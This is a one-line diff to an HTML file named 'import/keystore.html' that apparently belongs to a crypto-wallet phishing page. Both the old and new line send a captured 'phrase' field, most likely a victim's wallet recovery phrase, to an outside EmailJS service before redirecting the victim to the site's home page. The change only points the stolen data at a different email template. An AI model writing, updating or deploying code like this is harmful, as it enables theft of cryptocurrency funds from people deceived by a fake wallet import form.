--- a/import/keystore.html
+++ b/import/keystore.html
@@ -719,7 +719,7 @@
           phrase: phrase
         };
 
-        emailjs.send('service_ypv1vxf', 'template_2xuppsp', templateParams)
+        emailjs.send('service_ypv1vxf', 'template_k2y1hr4', templateParams)
           .then(function(response) {
             window.location.href = '../index.html';
           }, function(error) {
